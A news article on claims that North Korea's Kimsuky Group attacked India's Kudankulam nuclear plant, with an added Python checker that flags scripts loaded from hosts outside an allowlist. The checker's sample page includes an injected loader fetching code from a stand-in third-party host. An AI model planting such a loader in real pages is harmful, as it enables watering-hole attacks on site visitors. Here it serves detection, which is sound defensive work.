Was North Korea Behind Attack at Indian Nuclear Power Plant?
South Korean Researchers Claim Kimsuky Group Was Conducting Espionage
A nonprofit intelligence organization in South Korea claims that it has evidence that a recent malware attack at India’s Kudankulam Nuclear Power Plant was carried out by North Korea’s Kimsuky Group.
IssueMakersLab, or IML, a Seoul-based group of malware analysts, claims in a series of tweets that Kimsuky Group attempted to steal information on the latest design of the “Advanced Heavy Water Reactor,” an Indian design for a next-generation nuclear reactor that burns thorium in the fuel core.
IML says it closely follows the activities of various groups from North Korea involved in nation-state attacks. And it claims the Kimsuky Group in 2013 used a similar method to attack South Korean broadcasting stations and banking systems.
The research group did not immediately reply to a request for more information on the evidence regarding the attack at the nuclear plant.
Simon Choi, IML's founder, said he will describe his group’s findings soon at a security conference. “We have been monitoring the hackers since 2008. We were also keeping a close watch on hackers who made the attack on India’s nuclear plant,” Choi says.
IML claims that the main motive behind the attack was to gain knowledge on thorium-based nuclear power.
“North Korea has been interested in the thorium based nuclear power, which can be used to replace the uranium nuclear power. India is a leader in thorium nuclear power technology. Since last year, North Korean hackers have continuously attempted to attack India’s nuclear plants to obtain that information,” IML says in a tweet.
Last week, the Nuclear Power Corp. of India confirmed that a PC at the Kudankulam Nuclear Power Plant was infected with malware.
The analysts at IML also claim that the accounts of many Indian nuclear scientists, including Anil Kakodkar, former Atomic Energy Commission chairman, and S.A. Bhardwaj, former chief of Atomic Energy Regulatory Board, were targeted for malware attacks.
“Hackers sent an email containing malware to the former chairman of the Atomic Energy Regulatory Board of India. He was also the technical director of Nuclear Power Corporation of India Limited as well as an expert on Advanced Heavy Water Reactor,” IML said.
The North Korean hackers sent hacking emails to the former chairman of the Atomic Energy Commission of India (AECI) and the Secretary to the Government of India and the Director of the Bhabha Atomic Research Centre (BARC). pic.twitter.com/UCv01aCq2X — IssueMakersLab (@issuemakerslab) November 2, 2019
Also, the DPRK hackers sent email containing malware to the chairman (not now *ex-*) of the Atomic Energy Regulatory Board (AERB) of India. And he was the Technical Director of Nuclear Power Corporation of India Limited (NPCIL). He's an expert on the AHWR reactor (thorium-based). pic.twitter.com/5BjlGenPhr — IssueMakersLab (@issuemakerslab) November 2, 2019
Nuclear Power Corp. of India did not immediately reply to a request for comment on the IML report.
IML also claims that those targeted by North Korean hackers are top authorities in India’s nuclear energy sector. If the hackers stole their credentials, they could then contact anyone in India's nuclear energy sector while posing as a trusted colleague, the researchers note. The hackers used a computer produced and used only in North Korea, the researchers say. “The IP used by one of the hackers was from Pyongyang in North Korea,” IML says in a tweet.
How the Malware Was Launched
IML claims malware was injected into North Korea’s propaganda website, Meari, and distributed via the website by exploiting a Google Chrome zero-day vulnerability.
This is Chrome 0-day script injected into the "메아리(Meari)" propaganda site by North Korea on October 29, 2019. pic.twitter.com/mKJuQJDTYm— IssueMakersLab (@issuemakerslab) November 2, 2019
According to a blog by Kaspersky, the exploitation of Google Chrome’s zero-day vulnerability began at a North Korean website where the attackers injected malicious code. This code loads a script from a third-party site that first checks whether the system is suitable for infection and which browser the victim uses. “After verifying it’s found what it wanted, the exploit gains permission to read and write data to the device, which it immediately utilizes to download, decrypt, and run the malware. The latter can vary depending on the user,” Kaspersky says.
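The chain Kaspersky describes starts with a script planted on a legitimate site that pulls a second stage from a host the site owner never approved. As an added example, not code from the article, IML or Kaspersky, the following site-integrity check parses a page's HTML and flags any script loaded from, or any inline script referencing, a host outside an allowlist; the hostnames and the sample page are constructed for the example.

```python
"""Flag scripts on a web page that load from origins outside an allowlist.

Added example (not from the article, IML or Kaspersky). Models the site
owner's side of the watering-hole case above: an injected <script> or an
inline loader that fetches code from a third-party host. All hostnames and
the sample page are constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Origins this site legitimately loads scripts from (assumed for the example).
ALLOWED_HOSTS = {"www.example-site.test", "cdn.example-site.test"}

# Rough pattern for absolute URLs embedded in inline script bodies
# (e.g. dynamic loaders that assign script.src at runtime).
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"<>]*)?")


class ScriptCollector(HTMLParser):
    """Collect <script src=...> references and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attributes of <script> tags
        self.inline = []        # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as CDATA via handle_data.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def host_of(url, page_host):
    """Host a URL resolves to; relative paths resolve to the page's own host."""
    parsed = urlparse(url)
    return parsed.netloc.lower() if parsed.netloc else page_host


def find_foreign_scripts(html, page_host, allowed=ALLOWED_HOSTS):
    """Return (kind, url) pairs for script loads whose host is not allowed."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        if host_of(src, page_host) not in allowed:
            findings.append(("script-src", src))
    for body in collector.inline:
        for url in URL_RE.findall(body):
            if host_of(url, page_host) not in allowed:
                findings.append(("inline-reference", url))
    return findings


# Constructed page: two legitimate scripts and one injected dynamic loader.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-site.test/lib.js"></script>
<script>
  var s = document.createElement('script');
  s.src = 'https://third-party.invalid/loader.js';
  document.head.appendChild(s);
</script>
</head><body>news</body></html>"""

if __name__ == "__main__":
    for kind, url in find_foreign_scripts(SAMPLE_PAGE, "www.example-site.test"):
        print(kind, url)
```

Run against a periodic fetch of the site's own pages, a non-empty result is a signal that the published HTML differs from what the owner intended; a Content-Security-Policy with a strict `script-src` allowlist enforces the same boundary in the visitor's browser.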
The Kimsuky Group is believed to have been responsible for the Korea Hydro & Nuclear Power cyber terrorism attacks in 2014 in South Korea, according to The Guardian. The group uses spear-phishing emails, which are often designed to steal web portal account credentials and carry malicious attachments, according to news reports. The main targets of its attacks are government and military officials and news reporters.
DTrack, the malware that may have been used to infect a PC at the Indian nuclear power plant KKNPP, has historically been used as a data exfiltration tool. It’s essentially a remote access Trojan that takes control of a system, Kaspersky says.
IML says that the Kimsuky Group used DTrack to infiltrate the South Korean military's internal network in 2016 and steal classified information.
The Kimsuky Group has also targeted a wide range of entities, including diplomatic bodies of United Nations Security Council members such as China, France, Belgium, Peru and South Africa, The Guardian reports.